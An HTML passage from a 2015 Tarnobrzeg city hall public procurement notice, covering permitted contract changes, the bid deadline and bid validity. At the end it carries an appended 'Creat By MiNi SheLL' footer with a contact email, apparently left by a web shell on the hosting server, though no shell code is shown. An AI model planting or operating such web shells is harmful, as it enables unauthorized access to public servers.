<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje  możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku:
1.1 Skrócenia albo wydłużenia terminu wykonania przedmiotu Umowy, wyłącznie z przyczyn    niezależnych od Wykonawcy i mających wpływ na wykonanie przedmiotu umowy,  w przypadku zaistnienia następujących okoliczności:
a)	siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności; zmiana terminu realizacji o liczbę dni oddziaływania zdarzenia zewnętrznego,
b)	 wezwania przez organy administracji publicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy o czas niezbędny na uzupełnienie,
c)	przekroczenia przewidzianych przepisami prawa terminów trwania procedur administracyjnych, liczonych zgodnie z zasadami określonymi w kodeksie postępowania administracyjnego; zmiana terminu realizacji o liczbę dni przekroczenia przewidzianych przepisami prawa terminów, 
d)	szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych do umowy; zmiana terminu realizacji o liczbę dni ich pozyskania,
e)  zmiany przepisów prawa,
f)	udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego, od których wykonania uzależnione jest wykonanie zamówienia podstawowego, jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy. W takim przypadku termin wykonania zamówienia podstawowego może być przesunięty o czas niezbędny na zlecenie i wykonanie zamówienia dodatkowego lub zamiennego,
g) wydania polecenia zmiany,
1.2 Zamawiający jest uprawniony do zawieszenia wykonania umowy w takim czasie i w taki sposób, w jaki uważa to za konieczne. Zawieszenie następuje na podstawie pisemnego powiadomienia doręczonego Wykonawcy najpóźniej na 14 dni przed terminem zawieszenia. Jeżeli okres zawieszenia przekracza 60 dni i zawieszenie nie wynika z nie wywiązywania się z płatności przez Zamawiającego, to Wykonawca może, zawiadamiając Zamawiającego, domagać się zezwolenia na wznowienie wykonania umowy w terminie 30 dni lub rozwiązać umowę, z zachowaniem 14 dniowego okresu wypowiedzenia, 
  1.3 Zmniejszenia zakresu przedmiotu umowy wraz z ograniczeniem należnego wykonawcy wynagrodzenia, 
2. Zamawiający ma prawo jednostronnie zobowiązać wykonawcę do dokonania następujących zmian w przedmiocie umowy (polecenie zmiany):
2.1 Pominąć element przedmiotu umowy,
 2.2. Przed wydaniem polecenia zmiany Zamawiający może zobowiązać Wykonawcę do przedłożenia w określonym terminie stanowiska w zakresie:
      a) uzasadnienia dokonania zmiany,
       b)	opisu działań, czynności i opracowań niezbędnych do realizacji przedmiotu umowy 
          objętego poleceniem zmiany
       c)	zmiany wynagrodzenia - w przypadku zaistnienia okoliczności określonej w § 12 w ust. 
          2 pkt. 2.1.,
2.2 Zamawiający, po ewentualnym otrzymaniu od Wykonawcy stanowiska w zakresie polecenia zmiany, jest uprawniony do wydania polecenia zmiany. 
3. O zmianach teleadresowych, zmianach rachunku bankowego i tym podobnych Wykonawca powiadomi pisemnie Zamawiającego. Takie zmiany nie wymagają sporządzenia aneksu do umowy. 
4. Strony dopuszczają możliwość zmiany na etapie realizacji umowy podmiotów trzecich,  o których mowa w art. 26 ust. 2b ustawy Prawo zamówień publicznych, za pomocą których Wykonawca wykazał spełnianie warunków udziału w postępowaniu. W takim przypadku zaproponowany nowy podwykonawca, zobowiązany jest wykazać spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego dotychczasowy podwykonawca. Zmiana taka nie wymaga zawarcia aneksu do umowy. 
5. Wszelkie zmiany i uzupełnienia niniejszej umowy będą dokonywane wyłącznie na  piśmie w formie aneksu do umowy za zgodą obydwu STRON (za wyjątkiem tych opisanych  w pkt. 3 i 4).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarnobrzeg.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tarnobrzega
ul. Mickiewicza 7 
39-400 Tarnobrzeg
pok. 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2015 godzina 10:00, miejsce: Kancelaria Ogólna
Urząd Miasta Tarnobrzega
ul. Mickiewicza 7 
39-400 Tarnobrzeg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com